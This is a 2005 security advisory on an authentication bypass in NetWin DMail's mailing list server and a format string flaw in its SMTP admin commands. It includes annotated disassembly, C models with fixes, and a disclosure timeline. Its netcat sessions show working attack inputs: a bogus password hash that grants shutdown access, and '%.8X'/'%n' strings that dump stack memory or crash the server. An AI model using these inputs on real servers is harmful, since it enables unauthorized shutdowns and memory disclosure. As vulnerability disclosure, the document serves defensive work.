by Tan Chew Keong
Release Date: 03 May 2005
NetWin DMail is an easy to install, high performance, reliable and scalable mail server. It can either be used as a small personal mail server or as a 10 Million user ISP mail system. Flexible authentication modules allow you to plug DMail into any existing user database. It includes many spam prevention mechanisms and the ability to run any of several virus checking packages of your choice.
Two vulnerabilities were found in NetWin DMail. The first is an authentication bypass vulnerability in DMail's mailing list server (dlist.exe). This vulnerability may be remotely exploited to view logs generated by the mailing list server (dlist.exe) or to shut it down. The second is a format string vulnerability that exists in the admin commands of dsmtp.exe.
Tested on: DMail Version 3.1a NT (dm31b_win32.exe) on English Win2K SP4.
The NetWin DMail server package consists of the SMTP server (dsmtp.exe), the POP server (dpop.exe), the mailing list server
(dlist.exe), and the GUI management tool (dmadmin.exe). The GUI management tool (dmadmin.exe) allows the administrator
to manage the three servers and to retrieve live logs from them. dmadmin.exe sends admin commands to each of these three
servers via their respective listening ports. dmadmin.exe must authenticate to these servers using an admin
password (or password hash) when sending the admin commands.
This advisory documents two vulnerabilities found in the NetWin DMail server. The first is an authentication
bypass vulnerability that was found in DMail's mailing list server (dlist.exe). This vulnerability may be remotely
exploited by an attacker to view logs generated by the mailing list server (dlist.exe) or to shut it down without
the need to know the admin password. The second is a format string vulnerability that exists in the admin commands
of dsmtp.exe.
1. dlist.exe Authentication Bypass Vulnerability.
DList is the mailing list server that is part of the DMail package. DList listens on port 7111 and accepts
admin commands from dmadmin.exe (the GUI management tool). These admin commands are issued by dmadmin.exe to
receive logs from the DList server and/or to shut down the server.
When issuing an admin command, dmadmin.exe must authenticate to the DList server using a numeric hash of the admin password.
However, it is possible to bypass this authentication and issue sendlog or shutdown commands to the DList
server without knowing the password hash. A remote attacker may connect to the mailing list server on port 7111, bypass
its authentication, and shut it down or receive logs from it.
The following illustrates this.
C:\> nc 192.168.2.104 7111
hash 10687
password 234343 // suppose we do not know the password hash
err Password wrong
shutdown 234343 // we're not authenticated so can't shut down the server
error NOT AUTHORIZED YET
shutdown 234343
error NOT AUTHORIZED YET
sendlog 234343 // sendlog command has a bug that will cause us to be authenticated as long as
// the atoi value of the hash we sent is not 0 and 1.
ok Dlist 3.1a, loglevel info, sending log to this channel
log 29 01:14:02 info: Process request on chan 3 - done
shutdown 234343 // now we can shut down the server
log 29 01:14:14 info: Process request on chan 1
The problem lies in the _cmd_sendlog function as shown below. The code highlighted in red (the NEG/SBB/INC sequence
at 0041105F-00411063) collapses the computed hash to 0 or 1 instead of comparing it, and the use of JNZ means that the
user is considered to be "authenticated" as long as the atoi value of the supplied hash is neither 0 nor 1.
0041104F CALL dlist._tellnews_pass // Retrieve admin password
00411054 PUSH EAX
00411055 CALL dlist._lib_hash // Compute the hash of admin password
0041105A ADD ESP,8 // Hash in EAX
0041105D MOV ESI,EAX // Hash in ESI
0041105F NEG ESI
00411061 SBB ESI,ESI // ESI will be 0 or FFFFFFFF
00411063 INC ESI // ESI will be 1 or 0
00411064 MOV EDX,DWORD PTR SS:[EBP+C]
00411067 PUSH EDX // Pointer to user supplied hash
00411068 CALL dlist._atoi // Convert to integer
0041106D ADD ESP,4
00411070 CMP ESI,EAX // Compare ESI (1 or 0) with atoi value of user supplied hash
00411072 JNZ SHORT dlist.004110D5 // i.e. Authenticated if atoi(user_supplied_hash) != 0 and != 1
00411074 PUSH dlist.0043339C // Arg2 = 0043339C ASCII "err Password incorrect"
00411079 MOV EAX,DWORD PTR SS:[EBP+8]
0041107C MOV ECX,DWORD PTR DS:[EAX*4+459590]
00411083 PUSH ECX // Arg1
00411084 CALL dlist._tcp_printf // Reply "err Password incorrect" to user
...
...
...
004110D5 MOV EDX,DWORD PTR SS:[EBP+8]
004110D8 MOV DWORD PTR DS:[EDX*4+459634],1 // Set "Authenticated" to TRUE
004110E3 MOV EAX,DWORD PTR SS:[EBP+8]
004110E6 MOV DWORD PTR DS:[EAX*4+4595E0],1
004110F1 CALL dlist._log_getlvl
// Since the output of _lib_hash is usually not 0, CF will be set by NEG ESI. Hence "SBB ESI,ESI" will give FFFFFFFF, and
// INC ESI will give 0. i.e. in practice the user will be authenticated as long as atoi(user_supplied_hash) != 0.
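To make the logic error concrete, the following is an added C model of the check reconstructed from the disassembly above, beside the comparison the code was evidently meant to perform. It is constructed for this advisory and is not DMail source; toy_hash is an assumed stand-in for dlist._lib_hash (the real hash function is not shown here), and the password is a made-up sample.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Stand-in for dlist._lib_hash: a constructed 32-bit string hash, used only so
   the example runs offline. DMail's real hash function is not shown on the page. */
static uint32_t toy_hash(const char *s)
{
    uint32_t h = 5381;
    for (; *s; s++)
        h = h * 33u + (unsigned char)*s;
    return h;
}

/* The check as reconstructed from the _cmd_sendlog disassembly:
   NEG ESI / SBB ESI,ESI / INC ESI turns the hash into (hash == 0) ? 1 : 0,
   and CMP ESI,EAX / JNZ grants access whenever that value differs from
   atoi(user_supplied_hash). The real hash value is never compared at all. */
int sendlog_auth_as_shipped(const char *admin_pw, const char *user_hash)
{
    uint32_t hash = toy_hash(admin_pw);
    int32_t esi = (hash == 0) ? 1 : 0;   /* NEG / SBB / INC */
    int32_t eax = atoi(user_hash);        /* dlist._atoi */
    return esi != eax;                    /* JNZ -> "authenticated" */
}

/* The comparison the code was evidently meant to perform: accept the request
   only when the supplied value equals the hash of the configured password. */
int sendlog_auth_fixed(const char *admin_pw, const char *user_hash)
{
    return toy_hash(admin_pw) == (uint32_t)strtoul(user_hash, NULL, 10);
}

/* Helper for the fixed check: send the correct hash the way dmadmin.exe would. */
int fixed_accepts_correct_hash(const char *admin_pw)
{
    char buf[16];
    snprintf(buf, sizeof buf, "%lu", (unsigned long)toy_hash(admin_pw));
    return sendlog_auth_fixed(admin_pw, buf);
}

int main(void)
{
    const char *pw = "s3cret";            /* constructed sample admin password */
    printf("as shipped, hash 234343: %d\n", sendlog_auth_as_shipped(pw, "234343"));
    printf("as shipped, hash 0:      %d\n", sendlog_auth_as_shipped(pw, "0"));
    printf("fixed, hash 234343:      %d\n", sendlog_auth_fixed(pw, "234343"));
    printf("fixed, correct hash:     %d\n", fixed_accepts_correct_hash(pw));
    return 0;
}
```

Run stand-alone, the as-shipped model accepts the bogus value 234343 from the session above and rejects only 0, while the fixed comparison accepts nothing but the genuine hash. A code-review check for this class of bug is any comparison where a boolean-normalised value (the result of `!x` or a NEG/SBB/INC idiom) is tested against a full-width integer.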
2. dsmtp.exe Admin Commands Format String Vulnerability.
DSmtp is the SMTP server of the DMail package. DSmtp listens on port 25 for SMTP commands and can accept admin commands
from dmadmin.exe on the same port.
These admin commands allow dmadmin.exe to receive logs from the DSmtp server, shut down the server, and/or request specific
information from the server. A format string vulnerability exists in several admin commands, as shown below. However,
this vulnerability may only be exploited if the admin password is known.
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123456 %.8X%.8X // incorrect admin password
-ERR Invalid password, command rejected
xtellmail 123123 test // supply an invalid admin command with correct admin password (123123)
-ERR Unknown tellsmtp command (test)
xtellmail 123123 %.8X%.8X%.8X%.8X // supply a format string as the admin command
-ERR Unknown tellsmtp command (302F3932313020333A33343A20203835) // contents of stack printed
xtellmail 123123 %n%n%n%n%n // this will cause a crash
...CRASH.....
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123123 encode test
+DATA encoding test gives dGVzdAAA
+OK Done
xtellmail 123123 encode %.8X%.8X%.8X%.8X
+DATA encoding 00000006001114440000000000000000 gives JS44WCUuOFglLjhYJS44WAAA
+OK Done
xtellmail 123123 encode %n%n%n%n
...CRASH.....
This vulnerability is due to the unsafe use of the _vsnprintf function in _xmsg(char *formatstr, ...) and
_tcp_printf(arg1, char *formatstr, ...). This is illustrated below.
_cmd_tellmail(arg1, arg2, arg3, arg4, arg5)
{
    ...
    ...
    // unknown tellsmtp command: the client-supplied command name is the %s argument
    _xmsg("-ERR Unknown tellsmtp command (%s)", "%n%n%n%n");
    ...
}

_xmsg(char *formatstr, ...)
{
    // formatstr is "-ERR Unknown tellsmtp command (%s)"
    // arglist points to "%n%n%n%n"
    _vsnprintf(buffer, count, formatstr, arglist);
    // buffer is now "-ERR Unknown tellsmtp command (%n%n%n%n)"
    _tcp_printf(arg, buffer);   // buffer, which contains user data, becomes the next format string
}

_tcp_printf(arg1, char *formatstr, ...)
{
    // formatstr is "-ERR Unknown tellsmtp command (%n%n%n%n)"
    // arglist points to somewhere on the stack
    _vsnprintf(buffer, count, formatstr, arglist);
}
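The following added C example reproduces the double-formatting pattern described above beside its hardened form; it is constructed for this advisory and is not DMail code. tcp_printf is an assumed stand-in for dsmtp's _tcp_printf that writes into a buffer instead of a socket, and the probe command uses only "%%", which consumes no arguments, so the demonstration stays well-defined while still showing that the vulnerable path interprets client data as a format string.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 256

/* Stand-in for dsmtp's _tcp_printf: formats a reply and, instead of writing it
   to the socket, copies it into out. Constructed for this example; not DMail code. */
static void tcp_printf(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
}

/* The pattern the advisory describes: _xmsg formats the client-supplied command
   name into buffer, then hands buffer to _tcp_printf as its *format string*, so
   any %-sequences in the command are interpreted a second time. */
void xmsg_vulnerable(char *out, size_t outsz, const char *cmd)
{
    char buffer[REPLY_MAX];
    snprintf(buffer, sizeof buffer, "-ERR Unknown tellsmtp command (%s)", cmd);
    tcp_printf(out, outsz, buffer);          /* client data used as the format */
}

/* Hardened form: the finished reply is always an argument to a literal format. */
void xmsg_fixed(char *out, size_t outsz, const char *cmd)
{
    char buffer[REPLY_MAX];
    snprintf(buffer, sizeof buffer, "-ERR Unknown tellsmtp command (%s)", cmd);
    tcp_printf(out, outsz, "%s", buffer);
}

/* Returns 1 if the reply reaches the client verbatim (cmd echoed unchanged). */
int reply_is_verbatim(void (*xmsg)(char *, size_t, const char *), const char *cmd)
{
    char out[REPLY_MAX], expect[REPLY_MAX];
    snprintf(expect, sizeof expect, "-ERR Unknown tellsmtp command (%s)", cmd);
    xmsg(out, sizeof out, cmd);
    return strcmp(out, expect) == 0;
}

int main(void)
{
    /* "%%" consumes no arguments, so it probes the double interpretation without
       touching the stack: the vulnerable path collapses it to a single "%",
       the fixed path echoes it unchanged. */
    const char *probe = "te%%st";            /* constructed sample command */
    printf("vulnerable echoes verbatim: %d\n", reply_is_verbatim(xmsg_vulnerable, probe));
    printf("fixed echoes verbatim:      %d\n", reply_is_verbatim(xmsg_fixed, probe));
    return 0;
}
```

The same "%s" literal fix applies at every call site that passes an already-formatted buffer to _tcp_printf or _xmsg. On the detection side, admin command names containing "%" in dsmtp's logs have no legitimate use and are worth alerting on.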
- Vendor has been informed of these vulnerabilities by email.
- Block port 7111 with your firewall.
- Set a strong admin password.
17 Mar 05 - Vulnerability Discovered.
30 Mar 05 - Initial Vendor Notification (no reply).
05 Apr 05 - Second Vendor Notification.
05 Apr 05 - Initial Vendor Reply.
06 Apr 05 - Second Vendor Reply (will be uploading new versions this week).
22 Apr 05 - Status Check (no reply).
01 May 05 - Status Check (no reply).
03 May 05 - Public Release.
For further questions and enquiries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg